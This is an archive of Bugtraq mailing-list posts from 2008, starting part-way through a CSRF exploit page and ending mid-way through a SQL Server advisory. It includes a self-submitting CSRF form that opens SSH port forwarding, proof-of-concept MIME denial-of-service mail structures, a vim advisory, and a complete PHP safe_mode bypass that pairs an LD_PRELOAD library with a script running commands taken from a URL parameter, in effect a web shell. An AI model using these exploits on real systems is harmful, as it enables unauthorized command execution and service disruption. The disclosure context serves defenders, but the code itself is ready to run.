               <input name="ip1" value="192.168.1.101" type="hidden">
               <input name="to1" value="22" type="hidden">
               <input name="enable1" value="on" type="hidden">
       </form>
</html>
<script>
       document.getElementById(1).submit();//remote root command execution!
</script>

From - Mon Dec  8 17:19:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f1d
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38865-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 6A27DEC677
for <lists@securityspace.com>; Mon,  8 Dec 2008 17:12:20 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3506523712A; Mon,  8 Dec 2008 14:50:19 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25630 invoked from network); 8 Dec 2008 21:34:30 -0000
Date: Mon, 8 Dec 2008 16:50:14 -0500
From: Peter Watkins <peterw@tux.org>
To: Micheal Cottingham <techie.micheal@gmail.com>
Cc: piergiorgio@gigasec.org,
Giuseppe Gottardi <overet@securitydate.it>,
full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]
Message-ID: <20081208165014.A9096@gwyn.tux.org>
Reply-To: Peter Watkins <peterw@tux.org>
References: <c6298ab40811121259r2296aa06k317581d76a5f34b@mail.gmail.com> <491EA582.3060203@gigasec.org> <fec013240811150836u5f40dbb4g967dc0cac841a276@mail.gmail.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <fec013240811150836u5f40dbb4g967dc0cac841a276@mail.gmail.com>; from techie.micheal@gmail.com on Sat, Nov 15, 2008 at 11:36:26AM -0500
X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.6 (gwyn.tux.org [0.0.0.0]); Mon, 08 Dec 2008 16:50:21 -0500 (EST)
X-Virus-Scanned: ClamAV version 0.88.4, clamav-milter version 0.88.4 on gwyn.tux.org
X-Virus-Status: Clean
Status:   

On Sat, Nov 15, 2008 at 11:36:26AM -0500, Micheal Cottingham wrote:
> I found and reported this back in 2005/2006. Microsoft told me that it
> had been reported previously and that it would be fixed in the next
> release, which I'm guessing they meant 2007. I do not know if they
> have fixed it in Exchange 2007.

Similary, a few years ago (Nov/Dec 2005, I believe) I notified Microsoft 
about some CSRF flaws in OWA 2003. Sending a message, deleting a message, 
and logging out were all vulnerable. An attacker could trick a victim 
into sending an insult to her bosses (that would show up as an "internal"
message) and removing the message from her Sent Items folder. Clearing the 
deleted items folder, or removing a single message from the deleted items 
folder, did not appear to be vulnerable(!). Microsoft said the flaws were 
fixed in Exchange 2007 but I have no way of verifying that.

-Peter

From - Tue Dec  9 10:49:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f6b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38866-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3698FEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 10:49:21 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3406C237090; Tue,  9 Dec 2008 08:35:32 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 30314 invoked from network); 8 Dec 2008 22:41:15 -0000
Date: 8 Dec 2008 22:52:17 -0000
Message-ID: <20081208225217.10144.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: bruhns@recurity-labs.com
To: bugtraq@securityfocus.com
Subject: DoS attacks on MIME-capable software via complex MIME emails
Status:   

== DoS attacks on MIME-capable software via complex MIME emails =
== Preface =On the phneutral 0x7d8 and RSS 08, I gave short talks on a widely unregarded
problem with MIME software. Due to popular demand, I decided to publish a
short writeup of the talk.

== What is MIME? =MIME is the standard format for email-messages. One could say, MIME is for
email, what html is for the web. The first RFC for MIME was published in
1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
MIME is a recursive data format. MIME objects consist of a header and a
body, where the content-type field of the header specifies the type of the
body. The body can consist of several separated MIME-objects, a single
MIME-object, a block of text, an encoded image or about anything specified
in the header. It is possible to read some real-world examples by opening
some emails and hitting "show source".

== Two examples to illustrate MIME =The first example is the content-type:message/rfc822, which is intended for
forwarding emails. The following body is a complete email, which starts
again with a header, followed by a body. The second example is the
content-type:multipart/mixed. A pretty much self-explanatory example is
provided below. The parts of the body are separated by strcat("--",
boundary) and the body must be ended by strcat("--", boundary, "--").

From: <bruhns@hell>
To: <foo@bar>
Subject: example
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="n"

--n
content-type:text/plain

this is some plain text.
--n
content-type:message/rfc822

From: <bruhns@hell>;
Subject: example 2

This is not a MIME-mail, since the mime-version field is missing! However,
most software does not care.
--n--

== The problem =Even though MIME is pretty old, many people have not yet learned how to
parse MIME correctly. The problem is that the number of MIME-parts of an
email and the depth of recursion is potentially unlimited. Some software
like the popular rfc2045 library of the courier-mta solve this problem by
discarding mails with too many MIME-parts as a Denial of Service attack.
This is probably the best approach to handle this problem.

== Proof-of-Concept: Nesty =The nesty attack abuses the message/rfc822 type. The following example
crashes a lot of software, which tries to parse it recursively and
therefore overflows its stack:

Content-type: message/rfc822;

Content-type: message/rfc822;

Content-type: message/rfc822;

Content-type: message/rfc822;

... about 200kb. Note that this mail is not compliant to the rfc2045, since
the mime-version field is missing. However, most software does not care and
a lot of it chokes on this mail. In order to attack more rfc-abiding
software (mostly open-source), one can easily adapt the nesty mail to be
compliant. This however increases the size of the mail considerably, which
somehow takes away the elegance of crashing a server with only 200kb.


== Proof-of-Concept: Multikill =The multikill attack abuses the multipart/mixed type by creating an overly
large number of MIME-parts. Multipart/mixed could be used in a recursive
way, but this is not even needed for this attack. A lot of software freezes
upon the following example:

From: <bruhns@hell>
To: <foo@bar>
Subject: multikill
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="n"


--n

b

--n

... about 800kb or 70000 parts. For a lot of software, about 216 seems to
be the barrier, so you can't craft much more compact multikill attacks.

--n

b

--n--

== Impact =Firstly, the attack is DoS only. At this point it seems rather unlikely,
that command execution can be crafted on the basis of this problem.
However, the DoS vulnerability exposed by these proof-of-concept mails is
shared by many systems by different vendors and is trivial to exploit. The
ramnifications of this attack are therefore not really known yet. There is
still much testing to do.

And at last, there does not only exist a problem with emails with to many
MIME parts, but there exists a whole problem class and a whole class of
attacks, which are insufficiently researched and regarded by now. Of these
attacks, DoS via malformed MIME emails, the nesty and multikill mails are
only the first examples, the tip of the iceberg, so to say; once software
has been patched to correctly handle these emails, other people will come
up with other examples of malformed emails. To look at this attack even
more broadly, the topic of DoS attacks via overly complex instances of
recursive data types is not researched sufficiently.

== Effects on Outlook Express =Outlook freezes on the multikill mail. Outlook starts parsing emails while
downloading them. Upon parsing a multikill mail with more than about 216
parts, some library function goes into an endless loop. Outlook never
finishes downloading the multikill mail, it stays in the mailbox. Outlook
never closes the connection to the mail server, which is not nice to the
mailserver. Outlook can only be stopped by killing the process from the
task manager.

To be more exact, the bug seems to reside in InetComm.dll in the
MimeOleClearDirtyTree function. I would guess at a short-integer overflow,
which results in the infinite loop.

Microsoft was informed on 29.07.08 and declined to comment on this issue.

== Effects on Virusscanners =NOD32 takes several minutes of kerneltime to scan the multikill mails. ESET
did not comment on this issue and was informed on 01.08.08.
Kaspersky Internet Security Suite takes several minutes to scan the
multikill mail. Kaspersky was informed on 29.07.08, confirmed the issue and
promised to fix the problem.
Norton Antivirus takes several minutes to scan the multikill mails. Norton
was informed on informed 01.08.08 and answered promptly and politely.
Norton promised not to fix the problem, since it would not qualify as a
Denial of Service vulnerability.


== Specific Software =Vulnerable:
Microsoft Outlook Express 6, Version 6.00.2900.5512
Opera Version: 9.51 Build: 10081 System: Windows XP
Incredimail Build ID: 5853710 Setup ID: 7 Pn: 92977368
Norton Internet Security Version 15.5.0.23
ESet NOD32 2.70.0039.0000
Kaspersky Internet Security 2009; Databases from 23.07.2008

Slightly affected:
Mozilla Thunderbird Version 2.0.14 (20080421)

Not vulnerable:
Avira Antivir Search engine: v8.01.01.11, 17.07.2008
Mutt
Courier

== Correct handling of overly complex messages= =There exist examples of software, which excellently handles overly complex
MIME-mails. One is the rfc2045 -library of the courier-mta. Quote from the
man 3 rfc2045:

The rfcviolation field in the top-level rfc2045 indicates any errors found
while parsing the MIME message.
 rfcviolation is a bitmask of the following flags:

[...]
RFC2045_ERR2COMPLEX
    The message has too many MIME sections, this is a potential
denial-of-service attack.
RFC2045_ERRBADBOUNDARY
    Ambiguous nested multipart MIME boundary strings. (Nested MIME boundary
strings where one string is a prefix of another string).

Inspection of the source code reveals, that the parser of the courier-mta
allows only 300 mime parts and a nesting depth of 30 levels. Since courier
seems not to get too many complaints, this is probably a reasonable limit.

== History of this bug =I (re)discovered the bug independently in mid 2007. The bug was however
known before. There are some advisories like secunia.com/advisories/11360/
(for Eudora, bug still unfixed) by people who discovered the problem
before, but did not publicly announce or did not see the scope of it. More
recently, there has been a likewise advisory for sendmail, CVE-2006-1173.
There have been other advisories for different antivirus solutions. This
bug is not 0-day at all, it is really old. If you find older advisories,
which cover this bug, or knew it before, mail me so I can update this
section.

== Credit =This bug was discovered by Bernhard 'Bruhns' Brehm at Recurity Labs.
Company page: http://www.recurity-labs.com
Email-address: bruhns@recurity-labs.com
Wiki for further problem discussion: http://mime.recurity.com

Thanks to FX, Fabs and joern for various help.

Cheers,
Bruhns



From - Tue Dec  9 11:09:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f6c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38867-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 170AFEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 11:00:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id EA8EC2371AC; Tue,  9 Dec 2008 08:35:54 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3714 invoked from network); 9 Dec 2008 02:15:29 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=3hlmR50i4DK4s0k6cngA:9 a=RTkBuZu2aXRrjj1U2hwA:7 a=dHWn86UGz2KWNEToaWrnGpRNT20A:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2008:236-1 ] vim
Date: Mon, 08 Dec 2008 19:38:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1L9sU5-0002I7-1H@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                       MDVSA-2008:236-1
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : vim
 Date    : December 8, 2008
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Several vulnerabilities were found in the vim editor:
 
 A number of input sanitization flaws were found in various vim
 system functions.  If a user were to open a specially crafted file,
 it would be possible to execute arbitrary code as the user running vim
 (CVE-2008-2712).
 
 Ulf Härnhammar of Secunia Research found a format string flaw in
 vim's help tags processor.  If a user were tricked into executing the
 helptags command on malicious data, it could result in the execution
 of arbitrary code as the user running vim (CVE-2008-2953).
 
 A flaw was found in how tar.vim handled TAR archive browsing.  If a
 user were to open a special TAR archive using the plugin, it could
 result in the execution of arbitrary code as the user running vim
 (CVE-2008-3074).
 
 A flaw was found in how zip.vim handled ZIP archive browsing.  If a
 user were to open a special ZIP archive using the plugin, it could
 result in the execution of arbitrary code as the user running vim
 (CVE-2008-3075).
 
 A number of security flaws were found in netrw.vim, the vim plugin
 that provides the ability to read and write files over the network.
 If a user opened a specially crafted file or directory with the netrw
 plugin, it could result in the execution of arbitrary code as the
 user running vim (CVE-2008-3076).
 
 A number of input validation flaws were found in vim's keyword and
 tag handling.  If vim looked up a document's maliciously crafted
 tag or keyword, it was possible to execute arbitary code as the user
 running vim (CVE-2008-4101).
 
 A vulnerability was found in certain versions of netrw.vim where it
 would send FTP credentials stored for an FTP session to subsequent
 FTP sessions to servers on different hosts, exposing FTP credentials
 to remote hosts (CVE-2008-4677).
 
 This update provides vim 7.2 (patchlevel 65) which corrects all of
 these issues and introduces a number of new features and bug fixes.

 Update:

 The previous vim update incorrectly introduced a requirement on
 libruby and also conflicted with a file from the git-core package
 (in contribs).  These issues have been corrected with these updated
 packages.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2712
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2953
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3074
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3075
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3076
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4101
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4677
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 1ebd5f8b6c0743bab3db3113c2bb5498  2008.0/i586/vim-common-7.2.065-9.3mdv2008.0.i586.rpm
 ecad30a24814aa1543f3e9f4548c0d8e  2008.0/i586/vim-enhanced-7.2.065-9.3mdv2008.0.i586.rpm
 a62bc45e20c7cb05ea99471949fa057b  2008.0/i586/vim-minimal-7.2.065-9.3mdv2008.0.i586.rpm
 e5431f23309139db47583d100ebec5fc  2008.0/i586/vim-X11-7.2.065-9.3mdv2008.0.i586.rpm 
 f2413164a86b6635ee5ff016c3527d64  2008.0/SRPMS/vim-7.2.065-9.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 3fc6eb1eda476d642947ecaab7a225f2  2008.0/x86_64/vim-common-7.2.065-9.3mdv2008.0.x86_64.rpm
 0edf2753ba8a00f8d866e559f7a2192b  2008.0/x86_64/vim-enhanced-7.2.065-9.3mdv2008.0.x86_64.rpm
 692d5032e705bfda05b2b2618b8369d6  2008.0/x86_64/vim-minimal-7.2.065-9.3mdv2008.0.x86_64.rpm
 87bf7a4fba22dc1773b544eeb412db06  2008.0/x86_64/vim-X11-7.2.065-9.3mdv2008.0.x86_64.rpm 
 f2413164a86b6635ee5ff016c3527d64  2008.0/SRPMS/vim-7.2.065-9.3mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 c934d47ecaa0ed9d9bff2b89fea74f20  2008.1/i586/vim-common-7.2.065-9.3mdv2008.1.i586.rpm
 714185e359626acb9d22a88c54608a38  2008.1/i586/vim-enhanced-7.2.065-9.3mdv2008.1.i586.rpm
 59d119574eb3dc453305bed6da73a12e  2008.1/i586/vim-minimal-7.2.065-9.3mdv2008.1.i586.rpm
 4543e6fba5116a1d95fddfee3ce73613  2008.1/i586/vim-X11-7.2.065-9.3mdv2008.1.i586.rpm 
 d007fce1a939ef4e1841cf54c68dbdd0  2008.1/SRPMS/vim-7.2.065-9.3mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 f8375b1d25260274ef2b081eec0396ea  2008.1/x86_64/vim-common-7.2.065-9.3mdv2008.1.x86_64.rpm
 20577d11a3a22ff802a7e1c749099b76  2008.1/x86_64/vim-enhanced-7.2.065-9.3mdv2008.1.x86_64.rpm
 1aa16e6fb134f57f4faefb319bdd6840  2008.1/x86_64/vim-minimal-7.2.065-9.3mdv2008.1.x86_64.rpm
 99e25a76291297900ffce76e81e87e20  2008.1/x86_64/vim-X11-7.2.065-9.3mdv2008.1.x86_64.rpm 
 d007fce1a939ef4e1841cf54c68dbdd0  2008.1/SRPMS/vim-7.2.065-9.3mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 39b17b1ac441ba27254daeac8e593de6  2009.0/i586/vim-common-7.2.065-9.3mdv2009.0.i586.rpm
 477cbeec330709630426f06c474e3c48  2009.0/i586/vim-enhanced-7.2.065-9.3mdv2009.0.i586.rpm
 3ae2bf83194b6a323e78e09874a9cb3d  2009.0/i586/vim-minimal-7.2.065-9.3mdv2009.0.i586.rpm
 02c54fb5e618484f6312ddf0b98cb08b  2009.0/i586/vim-X11-7.2.065-9.3mdv2009.0.i586.rpm 
 26bb261499484986d9f352208dac6aab  2009.0/SRPMS/vim-7.2.065-9.3mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 6c00a2bcd26eed82708f625b0c2f4ecc  2009.0/x86_64/vim-common-7.2.065-9.3mdv2009.0.x86_64.rpm
 2a9dcd8a41b17ba2849df2e1d0da077f  2009.0/x86_64/vim-enhanced-7.2.065-9.3mdv2009.0.x86_64.rpm
 effaa23409fe3358318c291db55f6e6b  2009.0/x86_64/vim-minimal-7.2.065-9.3mdv2009.0.x86_64.rpm
 7ca4a070928495e0e8081bbe0b845c51  2009.0/x86_64/vim-X11-7.2.065-9.3mdv2009.0.x86_64.rpm 
 26bb261499484986d9f352208dac6aab  2009.0/SRPMS/vim-7.2.065-9.3mdv2009.0.src.rpm

 Corporate 3.0:
 474ad132ad608caf03176e33b81359f8  corporate/3.0/i586/vim-common-7.2.065-9.3.C30mdk.i586.rpm
 1349e3dcc99a0e100e185f344efabe3d  corporate/3.0/i586/vim-enhanced-7.2.065-9.3.C30mdk.i586.rpm
 5ee98b1525bd32dec3af623474c6ade4  corporate/3.0/i586/vim-minimal-7.2.065-9.3.C30mdk.i586.rpm
 3327eedd3e14cb7b426cdf0ba07ef5ed  corporate/3.0/i586/vim-X11-7.2.065-9.3.C30mdk.i586.rpm 
 9f059fa975e2d851e66f5e1eff88d3d0  corporate/3.0/SRPMS/vim-7.2.065-9.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 65e2168ca42319b7ba79f7dfe0e2143f  corporate/3.0/x86_64/vim-common-7.2.065-9.3.C30mdk.x86_64.rpm
 85092d93a8a040c567ce59d0512d8847  corporate/3.0/x86_64/vim-enhanced-7.2.065-9.3.C30mdk.x86_64.rpm
 dff08e81f6c2cede1de99ae96700178f  corporate/3.0/x86_64/vim-minimal-7.2.065-9.3.C30mdk.x86_64.rpm
 f299fe329b20cefb391976ffb9664b39  corporate/3.0/x86_64/vim-X11-7.2.065-9.3.C30mdk.x86_64.rpm 
 9f059fa975e2d851e66f5e1eff88d3d0  corporate/3.0/SRPMS/vim-7.2.065-9.3.C30mdk.src.rpm

 Corporate 4.0:
 37db43f0c3855a4c86d5237f4e5f292f  corporate/4.0/i586/vim-common-7.2.065-8.3.20060mlcs4.i586.rpm
 9ed45a0dd9eb354a508c893a2e177662  corporate/4.0/i586/vim-enhanced-7.2.065-8.3.20060mlcs4.i586.rpm
 6117088ff587d3b96090dc5232a37a36  corporate/4.0/i586/vim-minimal-7.2.065-8.3.20060mlcs4.i586.rpm
 61747391c926c371c679984941a5bfb9  corporate/4.0/i586/vim-X11-7.2.065-8.3.20060mlcs4.i586.rpm 
 cd60343d547090af2e9d0c3943d0aa81  corporate/4.0/SRPMS/vim-7.2.065-8.3.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 2956ef9554f0c8ffb523f243ad547ad0  corporate/4.0/x86_64/vim-common-7.2.065-8.3.20060mlcs4.x86_64.rpm
 5a8d2fbb71645fe83b977df339dd2069  corporate/4.0/x86_64/vim-enhanced-7.2.065-8.3.20060mlcs4.x86_64.rpm
 250987bbd2f083c308ea3849d9bdd524  corporate/4.0/x86_64/vim-minimal-7.2.065-8.3.20060mlcs4.x86_64.rpm
 3636d25dd546e0ea06cee2d9539aea81  corporate/4.0/x86_64/vim-X11-7.2.065-8.3.20060mlcs4.x86_64.rpm 
 cd60343d547090af2e9d0c3943d0aa81  corporate/4.0/SRPMS/vim-7.2.065-8.3.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 520cc910d9ee606478a83ac015814d09  mnf/2.0/i586/vim-common-7.2.065-9.3.C30mdk.i586.rpm
 c826084eb33961639c40377fc9b6a9b4  mnf/2.0/i586/vim-enhanced-7.2.065-9.3.C30mdk.i586.rpm
 2f724da0fe5da0022b298262f1188aa5  mnf/2.0/i586/vim-minimal-7.2.065-9.3.C30mdk.i586.rpm 
 1b626e0380d726aa8072089bd94eadfd  mnf/2.0/SRPMS/vim-7.2.065-9.3.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJPatcmqjQ0CJFipgRAp3vAJwMcdTivDsR5SM0N9sW/hnYXOb/YgCdFnRx
2uGyk940O65ZfGdUVa1xrEo=7tdF
-----END PGP SIGNATURE-----

From - Tue Dec  9 11:19:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f6e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38868-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B9D9BEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 11:10:24 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id CA2CC2373AC; Tue,  9 Dec 2008 08:36:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8655 invoked from network); 9 Dec 2008 07:41:51 -0000
Date: 9 Dec 2008 07:52:55 -0000
Message-ID: <20081209075255.17173.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: gat3way@gat3way.eu
To: bugtraq@securityfocus.com
Subject: PHP safe_mode can be bypassed via proc_open() and custom environment.
Status:   

This *should* work provided that you have met the following requirements:

1) A writable directory under documentroot to place those files (obviously)
2) You don't have proc_open in your disabled_functions list
3) You are able to compile a shared library on the same platform as the target web server.


Here is the library code, compile with cc -o a.so -fPIC -shared a.c

a.c:
----

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;

unsetenv("LD_PRELOAD");
a=fopen(".comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a);
rename("a.so","b.so");
system(buf);
system("mv output.txt .comm1");
rename("b.so","a.so");
free(buf);
return 0;
}

*cut*


And that is the PHP script:

evil.php:
-------------------------
<?php

$path="/var/www"; //change to your writable path


$a=fopen($path."/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);

$descriptorspec = array(
 0 => array("pipe", "r"),
 1 => array("file", $path."/output.txt","w"),
 2 => array("file", $path."/errors.txt", "a" )
);

$cwd = '.';
$env = array('LD_PRELOAD' => $path."/a.so");
$process = proc_open('examplecommand', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed


sleep(1);
$a=fopen($path."/.comm1","r");

echo "<pre><b>";
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a);
echo "</pre>";

?>


Why does that work?
-------------------

Because the PHP devs like to trust the environment. Especially the dynamic loader variables. 

If you have safe_mode enabled, you cannot execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash to your command string and strip "..". Yet, proc_open() enables you to provide your own environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and even though "yourcommand" is invalid, the LD_PRELOAD variable is passed to /bin/sh.

Then /bin/sh loads your "evil" library and then you can easily execute other commands, open files, etc, etc.


The library in question overloads getuid() in a way that it takes input from a text file, executes it and writes the output into another text file. 

This also works against open_basedir restrictions since the library can be under the documentroot.

The only tough thing from an attacker's perspective is to compile the library on the same platform as the attacked system.

And it works on linux only..

From - Tue Dec  9 11:29:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f6f
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38869-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8296FEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 11:22:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id A815B2373CE; Tue,  9 Dec 2008 08:37:26 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12065 invoked from network); 9 Dec 2008 11:59:22 -0000
Subject: SEC Consult SA-20081109-0 :: Microsoft SQL Server 2000
sp_replwritetovarbin limited memory overwrite vulnerability
From: Bernhard Mueller <research@sec-consult.com>
To: Full Disclosure <full-disclosure@lists.grok.org.uk>,
Bugtraq <bugtraq@securityfocus.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Content-Type: text/plain
Date: Tue, 9 Dec 2008 13:16:34 +0100
Message-ID: <1228824994.7036.8.camel@b4byl0n>
MIME-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Content-Transfer-Encoding: 7bit
Status:   

SEC Consult Security Advisory < 20081209-0 >
====================================================================================                  title: Microsoft SQL Server 2000 sp_replwritetovarbin
                         limited memory overwrite vulnerability
                program: Microsoft SQL Server 2000
     vulnerable version: <=8.00.2039
               homepage: www.microsoft.com
                  found: 04-12-2008
                     by: Bernhard Mueller (SEC Consult Vulnerability
Lab)
             perm. link:
http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
====================================================================================
Product description:
--------------------

Microsoft SQL Server is a relational database management system (RDBMS)
produced by Microsoft. Its primary query language is Transact-SQL, an
implementation of the ANSI/ISO standard Structured Query Language (SQL)
used by both Microsoft and Sybase.


Vulnerabilty overview:
----------------------

By calling the extended stored procedure sp_replwritetovarbin, and
supplying several uninitialized variables as parameters, it is possible
